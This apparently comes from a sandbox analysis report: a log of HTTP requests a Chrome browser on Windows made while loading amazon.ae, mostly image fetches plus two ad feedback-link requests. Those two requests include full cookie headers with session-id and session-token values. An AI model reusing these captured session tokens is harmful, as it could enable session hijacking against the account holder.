    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871140_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41aNmwLQvxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51nuyTB+MuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871142_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41BEfYOD4rL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924049_186x116_1X_en_AE._SY116_CB566513572_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924057_186x116_1X_en_AE._SY116_CB566513572_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924058_186x116_1X_en_AE._SY116_CB566503778_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71QNE71u1BL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61yFpBkswxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no; session-token=wUll0F4no7l9tPliyGKgLvlAAEELjfHKcJFzjW0ynq92lsg+mH223NtULYWESn2Mot8TG+uFHnE7n3w5VDki+yw05IIEV7ag/ggyw/YwGpMtnRbuMhFwzmUXe1lN0pukOaZb8Ih2JkZX1eXgZEKdKrDfkxF4guSmgyZNH6+9UULqN+0M8JltmEFqKKbiq149qIYHdGSMYteIDAV6KR/MM+XSRtI9JoamYzz/wm7syFkdpLE83Bh7Zl/MyCLwPiYE1VHyDDdBuun8drPYkCCGehL5uvaMNftgqo8GtBe6DKITy/jN+mPTvaEs15Vf3dQbiBG6BbttM0kNfgmvfMe/9If5U20+f6+p
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924059_186x116_1X_en_AE._SY116_CB566503778_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no; session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9
    Source: global trafficHTTP traffic detected: GET /images/I/31EO3Wv+aeL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31b7GLJLg9L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41CGjw1qziL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31+hYY59fPL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871139_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31zyL4SK5OL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61cw3ImGcLL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871140_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51Gz7IimgoL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51mS5FhRwRL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61Q2hRo4BCL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41YtSb5uAGL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41C83Jg7PlL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/414Wkl-jqYL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41daFqDf-bL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/317JiGToz-L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_laptops_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_SL_Backpaksshoesclothing_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
